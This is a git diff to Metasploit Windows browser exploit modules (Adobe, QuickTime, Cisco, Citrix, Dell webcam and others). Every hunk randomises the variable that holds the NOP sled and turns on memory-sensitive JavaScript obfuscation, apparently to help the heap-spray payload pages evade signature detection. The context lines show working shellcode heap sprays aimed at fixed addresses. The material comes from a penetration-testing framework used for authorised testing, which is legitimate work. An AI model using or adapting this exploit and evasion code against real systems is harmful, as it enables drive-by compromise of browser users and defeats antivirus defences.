diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
index 930cacf356..ccbc39b1e4 100644
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -208,11 +208,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_pivot = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
index 9c980b6ef9..5ff193aec3 100644
--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -138,11 +138,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -166,11 +168,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def get_aligned_spray(t, js_rop, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var rop_chain = unescape("#{js_rop}");
 
     while (nops.length < 0x80000) nops += nops;
@@ -370,7 +374,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb
index 9bf26fac88..c3dd135f5d 100644
--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -114,11 +114,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
@@ -138,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
index 4228fab535..5fdca5e3bc 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -208,6 +208,9 @@ class MetasploitModule < Msf::Exploit::Remote
       js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
     end
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     js = <<-JS
     function heap_spray(heaplib, nops, code, offset, max) {
       while (nops.length < 0x2000) nops += nops;
@@ -222,7 +225,8 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var code = unescape("#{shellcode}");
     heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
     var fake_pointers = unescape("#{pivot}");
@@ -234,7 +238,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #Javascript obfuscation is optional
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"
diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
index 671f7029d9..466a3b294b 100644
--- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
+++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
@@ -87,6 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Make some nops
     nops    = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Randomize variables
     rand1  = rand_text_alpha(rand(100) + 1)
@@ -94,7 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     script = %Q|
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 while (#{rand2}.length < #{target['Size']}) #{rand2} += #{rand2};
 #{rand2} = #{rand2}.substring(0, #{target['Size']} - #{rand1}.length);
 memory = new Array();
diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb
index e2e29c8b95..c40339d96e 100644
--- a/modules/exploits/windows/browser/adobe_geticon.rb
+++ b/modules/exploits/windows/browser/adobe_geticon.rb
@@ -91,13 +91,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
     rand12 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{randnop}");
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape(#{randnop});
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb
index dddaceeac0..86d5216d11 100644
--- a/modules/exploits/windows/browser/adobe_jbig2decode.rb
+++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb
@@ -85,16 +85,18 @@ class MetasploitModule < Msf::Exploit::Remote
     rand14	= rand_text_alpha(rand(50) + 1)
     rand15	= rand_text_alpha(rand(50) + 1)
     rand16	= rand_text_alpha(rand(50) + 1)
+    randnop     = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = "";
     var #{rand2} = "";
     var #{rand3} = unescape("#{shellcode}");
     var #{rand4} = "";
+    var #{randnop} = "#{nops}";
 
-    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape("#{nops}");
+    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape(#{randnop});
     #{rand6} = #{rand4} + #{rand3};
-    #{rand7} = unescape("#{nops}");
+    #{rand7} = unescape(#{randnop});
     #{rand8} = 20;
     #{rand9} = #{rand8}+#{rand6}.length
     while (#{rand7}.length<#{rand9}) #{rand7}+=#{rand7};
diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb
index 535d228fb9..7d1bd363d2 100644
--- a/modules/exploits/windows/browser/adobe_media_newplayer.rb
+++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb
@@ -106,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand3  = rand_text_alpha(rand(100) + 1)
     rand4  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
     rand5  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
+    randnop = rand_text_alpha(rand(100) + 1)
 
     vtbuf = [target.ret].pack('V') * 4
     vtbuf << rand_text_alpha(len - vtbuf.length)
@@ -114,8 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # The printd strings are 72 bytes (??)
     script = %Q|
+var #{randnop} = "#{nops}";
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = unescape("#{retstring}");
 while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
 #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb
index 3816abfb58..8838e8d9b9 100644
--- a/modules/exploits/windows/browser/adobe_utilprintf.rb
+++ b/modules/exploits/windows/browser/adobe_utilprintf.rb
@@ -72,13 +72,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand9  = rand_text_alpha(rand(100) + 1)
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
+    var #{randnop} = "#{nops}";
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(#{randnop});
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape("#{randnop}");
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
index 5a75d963a4..ebaa38daf0 100644
--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -115,13 +115,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{get_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -137,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
index 6cd93d0382..1a76b86962 100644
--- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb
+++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
@@ -83,6 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
     j_ret        = rand_text_alpha(rand(100) + 1)
     j_eax        = rand_text_alpha(rand(100) + 1)
     j_bof        = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|
@@ -90,7 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
 <OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='#{ampx}'></OBJECT>
 <script language='javascript'>
   #{j_shellcode}=unescape('#{shellcode}');
-  #{j_nops}=unescape('#{nops}');
+  var #{randnop} = "#{nops}";
+  #{j_nops}=unescape(#{randnop});
   #{j_headersize}=20;
   #{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
   while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
index d82db0711b..f2fee6ac14 100644
--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -182,7 +182,7 @@ heapSpray(myoffset,myshellcode,myfillsled);
 
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
       end
 
       content =  "<html>"
diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
index ebfc9cdf2c..b41131a018 100644
--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -189,13 +189,15 @@ class MetasploitModule < Msf::Exploit::Remote
       arch = Rex::Arch.endian(my_target.arch)
       nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
       code = Rex::Text.to_unescape(payload.encoded, arch)
+      randnop = rand_text_alpha(rand(100) + 1)
 
       # Spray puts payload on 0x31313131
       if my_target.name =~ /IE/
         spray = <<-JS
 var heap_obj = new heapLib.ie(0x20000);
 var code = unescape("#{code}");
-var nops = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var nops = unescape(#{randnop});
 
 while (nops.length < 0x80000) nops += nops;
 var offset = nops.substring(0, 0x800 - code.length);
@@ -216,12 +218,13 @@ for (var i=0; i < 1600; i++) {
         #obfuscate on demand
         if datastore['OBFUSCATE']
           js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-          js_spray.obfuscate
+          js_spray.obfuscate(memory_sensitive: true)
         end
       else
         js_spray = <<-JS
 var shellcode = unescape("#{code}");
-var bigblock = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var bigblock = unescape(#{randnop});
 var headersize = 20;
 var slackspace = headersize + shellcode.length;
 while (bigblock.length < slackspace) bigblock += bigblock;
diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
index c0ab0fc25d..b170b524a0 100644
--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -81,11 +81,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = payload.encoded
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     nops = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
@@ -132,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-EOS
diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb
index cf262262ae..7603788326 100644
--- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb
+++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|
       <html>
       <body>
diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
index b8ad0c2019..9e9ddd4206 100644
--- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
+++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
@@ -98,7 +98,7 @@ vulnerable.OnBeforeVideoDownload(evil_string);
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 
     # Generate the final HTML
     content = %Q|<html>
diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
index b18c2a100a..c0b601ffe3 100644
--- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
+++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
@@ -116,7 +116,7 @@ window.location = "#{hcp_url}";
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 =end
     js = encrypt_js(js, @javascript_encode_key)
 
diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
index c93a7b9d60..3f02a0c42a 100644
--- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
+++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
     x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
     x.url = "#{url}/#{dir}/";
 |
-    js.obfuscate
+    js.obfuscate(memory_sensitive: true)
     html = "<html>\n\t<script>#{js}\t</script>\n</html>"
     print_status("Sending #{self.name}")
     send_response_html(cli, html)
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
index 1bb8ae4b5e..5444a964bd 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -102,11 +102,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -222,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
       end
     end
 
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
index b48bf798ff..b431936497 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -147,11 +147,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -173,12 +175,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var nops_90 = unescape("#{js_90_nops}");
     var rop_chain = unescape("#{js_rop}");
 
@@ -396,7 +400,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     sploit = "http://"
diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb
index 13bcfab8a7..2bd69e3f79 100644
--- a/modules/exploits/windows/browser/citrix_gateway_actx.rb
+++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb
@@ -129,12 +129,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # payload in JS format
     code = Rex::Text.to_unescape(payload.encoded)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     #For debugging purposes: nops.substring(0,0x534) lands the payload exactly at 0x0c0c0c0c for IE6
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x1000) nops += nops;
     var offset = nops.substring(0, 0x550);
@@ -152,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     spray = heaplib(spray, {:noobfu => true})
     spray = ::Rex::Exploitation::JSObfu.new(spray)
-    spray.obfuscate
+    spray.obfuscate(memory_sensitive: true)
 
     load = %Q|
     var d=document.getElementById("nsepadiv");
diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb
index 86579e7e28..d979587708 100644
--- a/modules/exploits/windows/browser/creative_software_cachefolder.rb
+++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb
@@ -68,12 +68,16 @@ class MetasploitModule < Msf::Exploit::Remote
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     content = %Q|
       <html>
         <object id='#{vname}' classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715'></object>
         <script language="JavaScript">
         var #{rand1} = unescape('#{shellcode}');
-        var #{rand2} = unescape("%u0c0c%u0c0c");
+        var #{randnop} = "#{js_nops}";
+        var #{rand2} = unescape(#{randnop});
         var #{rand3} = 20;
         var #{rand4} = #{rand3} + #{rand1}.length;
         while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
index 90c03e3577..b281f2aae4 100644
--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -137,13 +137,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     # For IE 6, 7, 8
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
@@ -159,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
diff --git a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
index 9c63e0fe1d..c482cb5b58 100644
--- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
+++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
@@ -83,11 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = payload.encoded
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb
index f893fba392..92f3a77f3e 100644
--- a/modules/exploits/windows/browser/ea_checkrequirements.rb
+++ b/modules/exploits/windows/browser/ea_checkrequirements.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--
diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
index 54a85dae9d..44bfe234e5 100644
--- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
+++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
@@ -58,6 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
     shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
     nops    = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     ret     = Rex::Text.uri_encode([target.ret].pack('L'))
 
@@ -76,7 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
 <object classid='clsid:BA83FD38-CE14-4DA3-BEF5-96050D55F78A' id='#{vname}'></object>
 <script language='javascript'>
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb
index ef769faeea..3b330b079f 100644
--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-EOS
diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
index 067cb9c49d..c9377db86d 100644
--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -102,6 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -131,7 +132,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -150,7 +152,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
